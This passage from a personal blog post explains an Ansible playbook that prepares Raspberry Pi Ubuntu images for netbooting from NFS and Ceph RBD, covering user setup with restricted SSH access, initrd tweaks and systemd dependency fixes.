</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/eeprom-boot-mount-dep.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/systemd/system/rpi-eeprom-update.service.d/eeprom-boot-mount-dep.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0644&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">setup name resolution</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/resolv.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">content</span>: <span style="color:#e6db74">&#34;nameserver 10.86.5.254&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install NFS tools</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">nfs-common</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add rbd boot hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/rbd-gen-hook.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/initramfs-tools/hooks/rbd-gen-hook.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0644&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add rbd boot script</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/rbd-boot-script.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/initramfs-tools/scripts/rbd</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0644&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup flash-kernel initramfs gen hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/tmp/initd-flash-kernel.sh.bak</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remote_src</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/etc/initramfs/post-update.d/flash-kernel</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">temporarily delete flash-kernel initramfs hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/initramfs/post-update.d/flash-kernel</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install linux-modules-extra to get rbd kernel module</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">linux-modules-extra-raspi</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">restore flash-kernel initramfs gen hook</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/tmp/initd-flash-kernel.sh.bak</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remote_src</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/initramfs/post-update.d/flash-kernel</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">copy initrd to firmware partition</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">initramfs</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/boot/initrd.img</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/boot/firmware/initrd.img</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remote_src</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">remove old boot partition mount</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lineinfile</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/fstab</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#34;.*/boot/firmware.*&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add NFS based boot partition</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mount</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;{{ &#39;/boot/firmware&#39; if hn_pi is defined else &#39;/boot&#39;  }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#e6db74">&#34;nfs-host:/picluster-boot/{{ hn_host_id if hn_pi is defined else hn_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fstype</span>: <span style="color:#ae81ff">nfs</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">opts</span>: <span style="color:#ae81ff">defaults,timeo=900,_netdev</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">replace temporary resolv.conf with correct symlink</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/resolv.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">/run/systemd/resolve/resolv.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">link</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">force</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add rbd boot kernel command line arguments Pi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replace</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/boot/firmware/cmdline.txt</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#39;(^dwc_otg.lpm_enable=0.*)$&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">replace</span>: <span style="color:#e6db74">&#39;\1 boot=rbd rbdroot=10.0.0.15,10.0.0.12,10.0.0.14:clusteruser:{{ hn_ceph_key }}:pi-cluster:{{ hn_hostname }}::_netdev,noatime&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Add post kernel install chmod</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/zzz-chmod-kernel-image</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/kernel/postinst.d/zzz-chmod-kernel-image</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0755&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span></code></pre></div><p>Let&rsquo;s go through the playbook piece by piece.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Bootstrap python for ansible</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">gather_facts</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pre_tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install ansible dependencies</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">raw</span>: <span style="color:#ae81ff">apt -y install python3 sudo</span>
</span></span></code></pre></div><p>This initial play ensures that the necessary tooling for Ansible is installed.
Ansible requires Python 3 for the vast majority of it&rsquo;s modules, but provides
the <code>raw</code> module to work without any Python for initial setup.</p>
<h2 id="prepare-an-ansible-user">Prepare an Ansible user</h2>
<p>The next part will introduce a user for later use by Ansible once the image is
deployed. As you might guess, this user is not actually called <code>foobar</code> in my
setup. &#x1f609;</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">create user foobar</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ansible</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">create_home</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">shell</span>: <span style="color:#ae81ff">/bin/bash</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">groups</span>: <span style="color:#e6db74">&#39;&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">configure SSH key for foobar</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ansible</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">authorized_key</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">user</span>: <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">exclusive</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;file&#39;,&#39;ansible.pub&#39;) }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key_options</span>: <span style="color:#e6db74">&#39;{% if ansible_hostname != &#34;candc&#34; %}from=&#34;10.0.0.200&#34;{% else %}from=&#34;127.0.0.1&#34;{% endif %}&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add foobar to sudoers file</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ansible</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/sudoers.d/foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">content</span>: <span style="color:#e6db74">&#34;foobar ALL=(ALL:ALL) ALL&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#ae81ff">0440</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">validate</span>: <span style="color:#e6db74">&#39;visudo -cf %s&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set foobar password</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;{{ foobar_pw | password_hash(&#39;sha512&#39;) }}&#34;</span>
</span></span></code></pre></div><p>As this user will be quite powerful, I restrict the access to SSH via the
<code>from</code> option in the <code>authorized_keys</code> file to my command and control machine&rsquo;s
IP.</p>
<p>This part of the setup expects the SSH public key for your Ansible controller&rsquo;s
private key to reside in a file <code>ansible.pub</code>. Ansible will search a number of
<code>file/</code> directories to find the file.</p>
<p>Now, the user also needs to have sudo rights to function as an Ansible user.
Here, I&rsquo;m just giving it full rights in a separate <code>sudoers.d/</code> file, as that
is easier to configure in my opinion than mucking about with the <code>lineinfile</code>
or similar modules. Note especially the <code>validate: visudo -cf %s</code> option in that
task. It ensures that the new sudoers file is correctly formatted, so you don&rsquo;t
lock yourself out.</p>
<p>Finally, the password is set. Here, I&rsquo;m taking the plaintext password from the
<code>foobar_password</code> variable which we hand to Ansible in the Packer template file.
In my case, this password comes from my HashiCorp Vault instance to Packer, and
Packer then hands it to Ansible. The password hashing is important, as the <code>user</code>
module expects the hashed password instead of the plaintext password.</p>
<h2 id="some-basic-config-for-initrd-and-kernel-cmdline">Some basic config for initrd and kernel cmdline</h2>
<p>The next two tasks just remove a few options from the kernel command line in
<code>/boot/firmware/cmdline.txt</code>. This is purely a personal preferences thing.</p>
<p>The final two tasks are more interesting. First, the modification of the initrd
compression method. I have observed some unknown problem with the initrd
unpacking when using <code>lz4</code> compression, which became the default in Ubuntu
22.04. The bug seems to be known already, and is being rolled back, but at the
time I created the playbook, it was still set, and the compression needs to be
changed to <code>gzip</code>. This is done with the following task:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">switch initrd compression to gzip</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ubuntu</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lineinfile</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/initramfs-tools/conf.d/raspi-lz4.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">line</span>: <span style="color:#e6db74">&#34;COMPRESS=gzip&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regexp</span>: <span style="color:#e6db74">&#34;^COMPRESS=lz4$&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;644&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">create</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span></code></pre></div><p>The last task in this play is a personal preferences thing again. Ubuntu for
Pi makes use of the flash-kernel tool. This tool, before writing a kernel to
<code>/boot/firmware</code>, creates a backup of all the previous files, including e.g.
the initrd and the kernel itself. I don&rsquo;t need that, and disabled it with this
Ansible task:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Prevent automatic backups of files in /boot/firmware</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ubuntu</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lineinfile</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/default/flash-kernel</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">line</span>: <span style="color:#e6db74">&#34;NO_CREATE_DOT_BAK_FILES=yes&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_pi is defined</span>
</span></span></code></pre></div><h2 id="setting-up-the-netboot">Setting up the netboot</h2>
<p>This is probably the part you&rsquo;re all here for. And we&rsquo;re just in line 471 of my
markdown file. &#x1f605;</p>
<p>The first thing we do here is again some housekeeping. By default, you can put
local <a href="https://cloud-init.io/">cloud-init</a> files into <code>/boot/firmware</code> to have them
loaded early in boot. This means the <code>cloud-init</code> service has a dependency on
<code>/boot</code> being mounted. But the <code>cloud-init</code> service is also a dependency for
networking to come up (because you can change networking config in cloud-init).
But, with <code>/boot/firmware</code> being located on an NFS mount when netbooting, there
is now a circle in the systemd dependency tree: cloud init -&gt; <code>/boot</code> -&gt; networking
-&gt; <code>cloud-init</code>. Hence, I remove the dependency between <code>/boot</code> and cloud-init
with this task:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Remove /boot/firmware dependency for cloud-init-local service</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/systemd/system/cloud-init-local.service.d/mount-seed.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; </span>
</span></span></code></pre></div><p>This also means that default cloud-init for Pi&rsquo;s, which makes use of these
local files, will not work. I&rsquo;ve got the creation of a cloud-init server on
my list and will most likely make another article out of it if I succeed.</p>
<p>The next two tasks fix a problem with the automatic Pi EEPROM update service,
by adding a dependency on <code>/boot</code> being mounted.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">create directory for rpi eeprom service file dropin</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">file</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/systemd/system/rpi-eeprom-update.service.d</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">directory</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add dependency on boot/firmware mount for rpi eeprom service</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/eeprom-boot-mount-dep.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/systemd/system/rpi-eeprom-update.service.d/eeprom-boot-mount-dep.conf</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0644&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34; and hn_pi is defined</span>
</span></span></code></pre></div><p>This task creates a systemd dropin file which adds a dependency on <code>/boot</code> being
mounted, as the boot files are required by this service.
The content of the <code>eeprom-boot-mount-dep.conf</code> file can again be found in
the <a href="https://gist.github.com/mmeier86/97d8d55073ebcd4c832d7cc8a76241e7">GitHub Gist</a>.</p>
<h2 id="installing-nfs-tooling">Installing NFS tooling</h2>
<p>As NFS will be used to mount the <code>/boot</code> directory, we need to make sure that
NFS tooling is installed to make that possible.</p>
<p>These two tasks accomplish that:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">setup name resolution</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
